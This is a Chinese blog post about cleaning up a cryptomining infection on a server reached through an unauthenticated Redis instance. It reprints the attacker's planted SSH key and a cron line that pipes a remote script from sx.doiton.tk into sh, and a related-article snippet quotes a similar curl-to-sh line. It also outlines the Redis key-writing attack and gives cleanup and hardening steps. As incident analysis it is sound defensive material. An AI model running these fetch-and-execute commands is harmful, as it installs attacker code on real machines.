今天你的服务器被"挖矿"了吗?

最新推荐文章于 2024-07-05 00:29:32 发布
最新推荐文章于 2024-07-05 00:29:32 发布
阅读量1.1w 收藏 7
点赞数 1
分类专栏: 服务器 redis 文章标签: 服务器 安全 redis 挖矿
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yeshencat/article/details/73549345
版权

前几天我朋友给我反馈他的网站打开特别慢,我起初以为他网站访问人数多了并发高了、或者带宽不足、或者代码写质量问题、再或者SQL查询响应慢,或者 Redis “门”开着没关。我立马上服务器看了 top 了下,我惊呆了麻蛋 CPU 98%,第一想法就是粗事了,被干了。

登录到服务器 发现redis 开着门的,redis 未设置密码,且为 root 身份,允许任何源访问,看了下redis 储存的值,发现有一个 key 对于的 value 

106.14.57.249:6379> get ssh-key
"\n\nssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwrTqD/sDRtJarMUVAMj7h5NS3aP2nB8YBcJM4arLqNedVGfIXG/wlYPqb258bIJdbx15Xut6VSGMeYElXN80CGFSJq10RM+WWR+r1SjOlFvwXPyG/fxzI1B9DSGDVRXGLIGzHYuCPhtI/Auh6PhAfNdl/4HxQVGsRXYnLn2f3mNFFfSYykYf55s0JUKxSICv763XAeHlC3oFFkEkrNVO8L8nzDGK6Dk0sv+M27XIcVXH0wriPqrpikwaqHZU/5Pg4yFOTIiJ0FxikjKTT0v951HhcEdMzQSIIuD0aEB5Om+oemODGgEk/sJO6ayucXXoAy/7xuUFl+sWjRpwA/tI+w== root@iZ25510xsyoZ\n\n\n\n"

106.14.57.249:6379> get crackit
"\n\n\n* * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh\n\n\n\n"
106.14.57.249:6379>

看来redis已经别人干的不行了,言归正传吧。

这里写图片描述

CPU 已经100%,解决步骤如下:

  1. 找到进程和程序所在的目录 

    ps aux|grep wnTKYg*

  2. chmod -x /程序所在目录(一般tmp下)/wnTKYg

  3. kill -9 pid(wnTKYg进程ID)
  4. rm -rf /var/spool/cron (自己看下下面是否有自己的文件)
  5. rm -rf /root/.ssh known_hosts
  6. ps -aux|grep ddg* (一般tmp下)删除所有的ddg* 文件
  7. 看下 crontab -l 定时任务,是否有 莫名奇妙的shell
  8. redis 方面修改默认 6379 端口
  9. redis 设置复杂的密码
  10. redis 不允许使用 root 登录
  11. redis bind 下IP

他们是如何攻击的呢?

  1. 利用扫描工具,弱口令扫描redis 默认的 6397端口,可利用著名的 ZoomEye
  2. 本地生成 rsa ,储存到对方redis 缓存中
  3. 利用redis config set 来写入一个文件
  4. 最后 ssh 登录
深夜的猫
关注
专栏目录
记录服务器挖矿处理总结
LiXiaoJin's Blog
01-19 688
偶然发现CPU一直占用100%,开始还不太在意,后来想想我的程序也没这么多啊 导致机器登录ssh的时候都有点卡了。 开始检查机器,发现原来是被入侵了,有个木马一直占用 这才知道是被别人用来挖矿了,真是无语了 搞了好久没搞定,哎,能力有限,一生气直接重装系统了 以后安全防范一定要做到位。 希望不要再被入侵了,烦死了 这次算是体会到主机安全的重要性了,公司最近也在说这个问题,看来还是要多多重视。 总结一下: 我之前密码设置得太简单了,导致直接被暴力破解 安全防护做得不够,防火墙也没有打开 22端口
服务器被黑客用来挖矿?怎么办?
JAVA88866的博客
05-14 2388
哈喽,大家好,我是老表~ 昨天下午一个朋友和我说,他的服务器被阿里云监测出来在挖矿,然后阿里云官方把服务器给关停了。 不用急,这个时候最简单的方法是在阿里云里提一个工单,反馈相关问题。 解禁服务器 要解决问题、排查删除挖矿程序,首先我们需要解禁服务器,登录阿里云官方平台后,依次点击控制台->个人头像->安全管控进入相关页面。 在处罚列表,我们可以看到相关处罚记录,点击解除封禁后即可正常进入服务器了。 会有提示,需要在解禁后三日内找到挖矿程序,并删除,否则官...
我的服务器挖矿了,原因居然是...
m0_61869253的博客
06-24 264
比特币系统每隔一段时间就会在节点上生成一个随机代码,互联网中的所有设备都可以寻找这个代码,谁先找到就能获得奖励。而寻找代码的过程,就是挖矿。设备通过计算来筛选出符合条件的随机代码,每找到一个随机代码往往需要上万亿次的哈希运算,CPU通常会被顶到100%。为了降低成本,黑客往往会通过入侵的方式,控制别人的计算机来帮自己挖矿
CentOS:如何检查是否存在挖矿程序
最新发布
一些平时在开发过程中遇到的常见问题,分享给大家
07-05 435
CentOS:如何检查是否存在挖矿程序
区块链太火,小心你的服务器被动挖矿
kwame211的博客
05-30 3228
某日,笔者收到 VPS 服务器 CPU 告警,上服务器一看,有个叫做 gpg-agentd 的进程占用大量的 CPU 资源。接着就是常规的排查,IO 情况、网络流量、内存情况、系统日志、crontab 等。当排查到 crontab 时,发现 crontab 有如下的任务:*/5 * * * * curl -fsSL http://84.73.251.157:81/bar.sh | sh */5 *...
服务器遭遇挖矿怎么办?
2401_84466316的博客
06-03 1566
我们先来了解下虚拟货币,以比特币为例,比特币是一种由开源的P2P软件产生的网络虚拟货币,它不依靠特定货币机构发行,通过特定算法的大量计算产生,比特币经济使用整个P2P网络中众多节点构成的分布式数据库来确认并记录所有的交易行为。矿工需要为比特币网络提供的算法来换取比特币,每一个比特币的节点都会收集所有尚未确认的交易,并将其归集到一个数据块中,矿工节点会附加一个随机调整数,并计算前一个数据块的SHA-256散列运算值。
服务器提示有挖矿程序,是怎么回事
weixin_42341543的博客
03-25 2025
在提示我有挖矿程序后,我去阿里云的安全中心,看到有三个病毒进程警告,但是都结束进程失败,然后我询问售后工程师,售后工程师给我的回复时格式化云盘。因为没有找到更好的解决方式,就选择了重新安装系统和格式化云盘,已彻底清除病毒。 另外,如果没有主动进行挖矿程序,可能是因为安装的某些程序引起的。比如:安装redis时没有设置密码,或者使用默认端口都有可能引起病毒入侵。所以在安装redis时,不要使用默认端口6379,并且设置较为复杂的密码。 ...
痛心:实验室服务器挖矿怎么办?
「 虚幻私塾」
04-18 940
Python微信订餐小程序课程视频 https://blog.csdn.net/m0_56069948/article/details/122285951 Python实战量化交易理财系统 https://blog.csdn.net/m0_56069948/article/details/122285941 痛心:实验室服务器挖矿怎么办? 痛心:实验室服务器挖矿怎么办? 更改SSH配置 限制IP访问 设置Linux-PAM 开启防火墙 查看日志 参考资料 实验室的服务器有比较高的配置,安装了多
阿里云服务器挖矿程序侵入问题
samfaker的博客
08-23 1312
gitlab漏洞引起的无文件、无定时任务的挖矿程序解决方法
排查腾讯云服务器挖矿病毒【pnscan】挟持
fanxindong0620的博客
09-27 6517
一、问题发现 最新在使用腾讯云部署项目应用,具体方式为docker部署,今天早上起床发现腾讯发来一条报警信息: 二、排查过程 使用last查看最近登录信息 使用history查看历史指令 查看/etc/passwd下的账户信息 查看日志文件/var/log/secure和/var/log/message 使用top查看进程运行信息 使用netstat查看端口信息 三、解决方案 ...
一次服务器挖矿的处理解决过程
weixin_34228387的博客
07-28 1753
内网一台服务器cpu爆满,第6感猜测中了挖矿病毒,以下为cpu爆满监控图表赶紧ssh进系统,top了下,一个./x3e536747 进程占用了大量的cpu,cpu load average超过了cpu内核数,先kill掉进程,不用猜,等会肯定会继续启动,检查开放端口,发现postgresql直接对外开放的。肯定是通过这个入口***进来的;暂时关闭外网pg 5432端口;找到挖矿执行路径,都在/tm...
服务器被检测出挖矿
XRY_XIAO的博客
05-30 527
有位朋友说,他服务器使用的好好的,服务商突然封了他服务器,说是被检测出挖矿,这位朋友一脸懵“我开游戏的,挖什么矿”。突然地关停服务器导致这位朋友损失惨重,那么为什么会被检测出挖矿,以及怎么处理呢?感兴趣的话就继续往下看吧~ 遇到以上问题,需要先找服务器商对其说明实际情况,配合他们排查,基本上就是中了挖矿病毒。 最简单的方法就是重装系统,但是系统盘数据都会清空,这种办法适用于服务器里没什么需要备份的文件。如果选择重装系统,需要把自己的文件扫毒一遍确认安全后再导入服务器。 但是服务器里如果有很多重要的文件还
今天,你的服务器被“挖矿”了吗?
weixin_34010566的博客
06-10 463
本文作者:晨光 运维工程师 web服务应用是最为常见的应用之一,主要是通过对公网放行服务器的端口供客户访问来提供服务。这类服务对数据安全、访问控制的要求会比较高。但最为核心的还是后端服务器主机层,当后端主机不能正常工作时,前端展示的web服务一定是收到牵连的,如何维护后端服务器正常运行就显得尤为重要了。 这里提到后端主机的正常运行,就不得不提“***”这个词了,让互联网小白一筹莫展的无形杀手。他...
记一次苦逼的服务器挖矿的清除过程
bobpen的专栏
02-21 2万+
环境说明 Centos 6.2 现象描述       通过top查看服务器资源,cpu资源几乎被占尽,但是top list里面却没有显示出是哪个进程占用的资源 而且系统会提示以下信息 通过关键字查询miner & crytonight,得知服务器被而已挖矿了 解决办法 1.linux进入single模式 进入singl
Linux服务器挖矿病毒处理
自己在学习过程中的总结
06-19 1877
情况说明:挖矿进程被隐藏(CPU占用50%,htop/top却看不到异常进程),结束挖矿进程后马上又会运行起来(crontab -l查看发现没有定时任务)。1.中毒表现 2.解决办法:断网并修改root密码,找出隐藏的挖矿进程,关闭病毒启动服务,杀掉挖矿进程 3. 防止黑客再次入侵:查找异常IP,封禁异常IP,查看是否有陌生公钥。中毒表现:服务器是24核的,前12核的CPU占用一直处于100%,即使重启服务器,马上就会占用12核的CPU,并且系统内存占用也很大。在没有使用软件的情况下,CPU使用率很高。
阿里云服务器挖矿的解决方法
qq_47464056的博客
07-25 5010
服务器被入侵植入挖矿程序!
记一次Linux被入侵,服务器变“矿机”全过程
yeluoxiang的专栏
06-13 4718
“周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云...
阿里云服务器挖矿程序minerd入侵的终极解决办法
热门推荐
Java高知社区
01-06 4万+
突然发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了200%多的CPU, 百度了一下,查到几篇文章都有人遇到同样问题,解决的办法:http://blog.csdn.net/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务。 找不到根源,那个minerd进程删掉就又起来了,后来想了个临时办法,先停掉
服务器被植入挖矿程序
Fight_Rain的博客
06-11 6294
在阿里云管控台看到有两台服务器cpu使用率一直在100左右,而平时只有不到1 解决1: 连到服务器,top命令发现wipefs进程占用大量cpu资源,先kill掉该进程,再删除一些文件,具体参考https://www.cnblogs.com/liuchuyu/p/7490338.html,删除时可能遇到Operation not permitted,一般是文件属性为 —i———-,先cha...
服务器挖矿了需要重装系统吗
06-10
一般情况下,云服务器挖矿后最好的解决办法是重装系统。因为挖矿病毒通常会在系统中留下一些后门或者恶意程序,这些程序可能会继续在后台运行,重新感染服务器或者窃取敏感信息。所以,为了确保服务器安全,建议重装系统,并且重新设置密码和安装所需的软件和服务。在重装系统前,应该备份重要数据和文件,以免数据丢失。同时,应该对服务器的防火墙、访问控制、日志监控等方面进行加固,减少被攻击的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值